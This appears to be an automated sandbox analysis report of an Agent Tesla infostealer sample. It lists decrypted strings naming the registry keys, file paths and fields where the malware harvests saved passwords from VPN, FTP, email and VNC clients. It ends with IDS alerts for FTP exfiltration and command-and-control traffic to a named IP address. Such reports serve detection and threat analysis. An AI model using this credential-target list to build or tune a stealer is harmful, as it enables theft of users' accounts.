Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ALLUSERSPROFILE
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Dyn\Updater\daemon.cfg
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: global
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: accounts
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: account.
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: username
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: account.
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: password
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Psi/Psi+
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: name
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: password
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Psi/Psi+
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: APPDATA
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Psi\profiles
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: APPDATA
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Psi+\profiles
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \accounts.xml
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \accounts.xml
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: OpenVPN
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Software\OpenVPN-GUI\configs\
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: username
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: auth-data
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: entropy
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: USERPROFILE
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \OpenVPN\config\
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: remote
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: remote
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: NordVPN
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: NordVPN
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: NordVpn.exe*
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: user.config
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: //setting[@name='Username']/value
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: //setting[@name='Password']/value
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: NordVPN
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Private Internet Access
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: %ProgramW6432%
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Private Internet Access\data
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Private Internet Access\data
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \account.json
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ."username":"(.?)"
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ."password":"(.?)"
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Private Internet Access
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: privateinternetaccess.com
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: FileZilla
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: APPDATA
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: APPDATA
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \FileZilla\recentservers.xml
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <Server>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <Host>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <Host>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: </Host>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <Port>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: </Port>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <User>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <User>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: </User>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: </Pass>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <Pass>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <Pass encoding="base64">
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: </Pass>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: CoreFTP
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SOFTWARE\FTPWare\COREFTP\Sites
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: User
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Host
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Port
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: hdfzpysvpzimorhk
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: WinSCP
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: HostName
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: UserName
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Password
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: PublicKeyFile
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: PortNumber
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: [PRIVATE KEY LOCATION: "{0}"]
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: WinSCP
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ABCDEF
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Flash FXP
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: port
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: user
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: pass
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: quick.dat
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Sites.dat
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \FlashFXP\
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \FlashFXP\
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: FTP Navigator
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SystemDrive
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \FTP Navigator\Ftplist.txt
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Server
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Password
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: No Password
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: User
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SmartFTP
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: APPDATA
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: WS_FTP
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: appdata
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: HOST
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: PWD=
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: PWD=
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: FtpCommander
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SystemDrive
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SystemDrive
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SystemDrive
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \cftp\Ftplist.txt
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ;Password=
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ;User=
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ;Server=
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ;Port=
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ;Port=
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ;Password=
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ;User=
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ;Anonymous=
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: FTPGetter
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \FTPGetter\servers.xml
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <server>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <server_ip>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <server_ip>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: </server_ip>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <server_port>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: </server_port>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <server_user_name>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <server_user_name>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: </server_user_name>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <server_user_password>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <server_user_password>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: </server_user_password>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: FTPGetter
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: The Bat!
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: appdata
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \The Bat!
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Account.CFN
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Account.CFN
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Becky!
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: DataDir
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Folder.lst
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Mailbox.ini
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Account
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: PassWd
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Account
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SMTPServer
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Account
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: MailAddress
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Becky!
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Outlook
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Email
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: IMAP Password
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: POP3 Password
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: HTTP Password
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SMTP Password
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Email
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Email
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Email
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: IMAP Password
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: POP3 Password
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: HTTP Password
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SMTP Password
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Server
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Windows Mail App
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Software\Microsoft\ActiveSync\Partners
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Email
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Server
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SchemaId
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: pResourceElement
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: pIdentityElement
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: pPackageSid
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: pAuthenticatorElement
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: syncpassword
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: mailoutgoing
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: FoxMail
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Executable
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: FoxmailPath
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Storage\
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Storage\
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \mail
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \mail
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \VirtualStore\Program Files\Foxmail\mail
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Accounts\Account.rec0
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Accounts\Account.rec0
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Account.stg
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Account.stg
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: POP3Host
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SMTPHost
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: IncomingServer
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Account
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: MailAddress
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Password
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: POP3Password
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Opera Mail
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Opera Mail\Opera Mail\wand.dat
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: opera:
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\\|';:,<>/?+=
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: PocoMail
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: appdata
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Pocomail\accounts.ini
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Email
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: POPPass
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SMTPPass
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SMTP
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: eM Client
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: eM Client\accounts.dat
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: eM Client
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Accounts
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: "Username":"
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: "Secret":"
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: "ProviderName":"
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: o6806642kbM7c5
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Mailbird
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SenderIdentities
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Accounts
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Mailbird\Store\Store.db
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Server_Host
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Accounts
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Email
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Username
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: EncryptedPassword
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Mailbird
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: RealVNC 4.x
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Password
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: RealVNC 3.x
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SOFTWARE\RealVNC\vncserver
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Password
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: RealVNC 4.x
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SOFTWARE\RealVNC\WinVNC4
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Password
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: RealVNC 3.x
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Software\ORL\WinVNC3
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Password
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: TightVNC
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Password
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: TightVNC
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: PasswordViewOnly
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: TightVNC ControlPassword
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Software\TightVNC\Server
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ControlPassword
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: TigerVNC
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Software\TigerVNC\Server
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Password
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: UltraVNC
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: passwd
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: UltraVNC
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: passwd2
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: UltraVNC
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: passwd
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: UltraVNC
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: passwd2
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: UltraVNC
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: passwd
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: UltraVNC
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ProgramFiles
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: passwd2
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: UltraVNC
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: passwd
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: UltraVNC
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ProgramFiles(x86)
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \UltraVNC\ultravnc.ini

Source: umVoLahqZn.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: umVoLahqZn.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49823 -> 162.241.203.30:21
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49830 -> 162.241.203.30:49139

Source: global traffic

TCP traffic: 192.168.2.5:49830 -> 162.241.203.30:49139

